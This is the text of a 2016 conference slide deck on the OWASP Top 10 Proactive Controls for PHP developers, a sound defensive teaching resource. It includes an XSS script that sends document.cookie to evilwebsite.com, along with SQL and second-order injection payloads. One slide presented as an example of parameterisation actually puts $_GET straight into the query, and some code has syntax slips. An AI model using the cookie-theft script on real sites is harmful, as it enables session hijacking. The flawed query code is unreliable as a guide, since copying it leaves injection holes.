OWASP Top 10 Proactive Controls

Katy Anton @katyanton October 2016 1

PHPNW16

OWASP Top 10 Risks - 2013 A1 - Injection

A2 - Broken Authentication and Session Management

A3 - Cross Site Scripting ( XSS )

A4 - Insecure Direct Object References

A5 - Security Misconfiguration

A6 - Sensitive Data Exposure

A7 - Missing Function Level Access Control

A8 - Cross-Site Request Forgery (CSRF)

A9 - Using Components with Known Vulnerabilities

A10- Unvalidated Redirects and Forwards

2

Katy Anton

• Software development background • Certified Secure Software Lifecycle Professional (CSSLP)• Application Security Consultant @Veracode • OWASP Bristol Chapter Leader • Project Co-Leader for OWASP Top 10 Proactive Controls

@katyantonhttps://www.linkedin.com/in/katyanton

Cyber attacks 2015 - 2016

4

Symfony implementation

Disclosure of information

SQL Injection

New Website

5

OWASP Application Security Verification Standard (ASVS)

6

C1. Verify for Security Early and Often

7

• Choose the level of security for your application • Security requirements and tests - OWASP ASVS• Verify for Security Early and Often (OWASP ZAP - continuous integration )

8

Proactive Control Risks prevented C1.Verify for security early and often

All OWASP Top 10 Risks!

SQL injection example

9

$email=‘;- - @owasp.org;$sql = UPDATE user set email=‘$email’ WHERE id=‘1’;

$sql = UPDATE user SET email=‘'; -- @owasp.org' WHERE id=‘1’;

Becomes

C2. Parameterize Queries

10

Parameterize Queries prevent untrusted input from being interpreted

as part of a SQL command.

PHP:

<?php

$stmt = $dbh->prepare(”Update users set email = $_GET[‘email’] where id=$id”);

$stmt->execute();

Example of Query Parametrisation

C2. Control: Data Access Layer

11

How not to do it !

C2: How NOT to

$sql = ”Update users set email=$_GET[‘email’] where id=$id”

This one string combines both the code and the input.

SQL parser cannot differentiate between code and user input.

12

C2. Control: Data Access Layer

13

PHP: Query Parametrization - Correct Usage<?php $stmt = $dbh->prepare(”Update users set email=:new_email where id=:user_id”);

$stmt->bindParam(':new_email', $email’);$stmt->bindParam(':user_id', $id);

$stmt->execute();

14

Proactive Control Risks prevented C2.Parameterize Queries

A1. Injection

XSS example

15

<script type=“text/javascript”>var adr = ‘http://evilwebsite.com/send.php?cakemonster=‘ + escape(document.cookie);

var img = new Image();

img.src = adr;

</script>

C3. Encode Your Output

16

C3: Controls - Contextual Encoding

Symfony 2+ Twig

ZF2 Zend\Escaper

17

18

Proactive Control Risks prevented C3. Encode Output A1. Injection

A3. XSS

C4. Validate All Input

19

C4: Example of Validations

20

• GET / POST data (including hidden fields )• File uploads• HTTP Headers• Cookies• Database

C4: Controls

21

PHP filter extension, available as standard since v5.2

Example of both validation and sanitisation :<?php

$sanitised_url = filter_var($url, FILTER_SANITIZE_URL); if (filter_var($sanitised_url, FILTER_VALIDATE_URL)) { echo “This is a valid URL.”;}

Input Validation Prevents 2nd Order SQL Injection

Register form

• Two users : “john” and “john’ - - “• Username value “john’ –-” becomes the

sql injection payload 22

john’- -Username

Password

Change password form:

Logged as john’ - -

2nd Order SQL Injection Example

23

Current Password

New Password

New Password

2nd Order SQL Injection Example

UPDATE users SET password='123 ' WHERE username='john'--' and password=‘abc'

UPDATE users SET password='123 ' WHERE username='john'

24

Becomes

25

Proactive Control Risks prevented C4. Validate All Input

A1. Injection A3. XSSA10. Unvalidated redirects & forwards

New Website

26C1

Verify for Security Early and Often

C3Encode Data

C4Validate Input

C2Parametrize Queries

C5. Implement Identity and Authentication Control

27

C5: Best practices

• Secure Password Storage• Multi-Factor Authentication• Secure Password Recovery Mechanism• Transmit sensitive data only over TLS (v1.2)• Error Messages • Prevent Brute-Force Attacks

28

C5. PHP Password storage

• password_hash(“my_password”)• since php v5.5• compatibility library for versions <5.5

29

C5. Password storage – How Not To

$password=bcrypt([salt] + [password], work_factor);

$loginkey =md5(lc([username]).”::”.lc([password]))

Be consistent when storing sensitive data!

30

C5. Forgot Password

Forgot password design:1). Ask one or more security questions

2). Send the user a randomly generated token

3). Verify token in same web session.

4). Change password.

Resources https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet 31

Error message for valid user

Error messages = be identical on both HTTP and HTML.How not to do it !

Error message for not-registered user

C5. Error messages

32

33

Proactive Control Risks prevented C5. Establish Identity and Authentication Controls

A2. Broken Authentication and Session Management

C6. Implement Appropriate Access Controls

34

C6: Best Practices

• Deny by default

• Least privilege

• Force all requests to go through access control checks

• Check on the server when each function is accessed

35

C6: Role vs Resource based ACLsResource based

if (user.isPermitted("project:view:123")) { //show the project report button} else { //don't show the button}

36

Role based

if (user.hasRole("Project Manager") ) { //show the project report button} else { //don't show the button}

if (user.hasRole("Project Manager") || user.hasRole("Admin") ) { //show the project report button} else { //don't show the button}

37

Proactive Control Risks prevented C6: Implement Appropriate Access Controls

A4. Insecure Direct Object References A7. Missing Function Level Access Control

C7. Protect Data

38

C7 Controls: Data in transitData in transit: HTTPS• Confidentiality: Spy cannot view your data

• Integrity: Spy cannot change your data

• Authenticity: Server you visit is the right one

39

MITM Protection - HSTS• HTTPS + Strict Transport Security Header

C7 Controls: Data at rest 1. Algorithm

•AES (Advanced Encryption Standard )2. Secure key management3. Adequate access controls and auditing

40

41

Proactive Control Risks prevented C7: Protect Data A6. Sensitive Data

Exposure

New Website

42C1

Verify for Security Early and Often

C3Encode Data

C4Validate Input

C6Access Controls C5

Authentication

C7Protect Data

C2Parametrize Queries

C8. Implement Logging and Intrusion Detection

43

44

Proactive Control Risks prevented C8.Logging and Intrusion Detection

All OWASP Top 10 Risks!

C9. Leverage Security Frameworks and Libraries

45

C9: Examples

• Framework with CSRF protection

• Framework with XSS protection

• ORM - SQL injection prevention

• Vetted Cryptographic algorithm

46

C9: Best Practices

Use trusted sources

Low-coupling

(Low-coupling == reduced attack surface)

Update regularly / replace

47

48

Proactive Control Risks prevented C9. Leverage Security

All OWASP Top 10 Risks!

C10. Error and Exception Handling

49

C10: Best Practices

Centralised error handling

Verbose enough to explain the issue

Don’t leak critical information

50

51

Proactive Control Risks prevented C10. Error and Exception Handling

All OWASP Top 10 Risks!

New Website

52C1

Verify for Security Early and Often

C3Encode Data

C4Validate Input

C6Access Controls C5

Authentication

C7Protect Data

C10Error Handling

C8Logging

C2Parametrize Queries

C9 Leverage security

It’s a Start

To Secure Software by Default!

53

Reference

OWASP Proactive Controls Project:

https://www.owasp.org/index.php/OWASP_Proactive_Controls

54

Thank you

55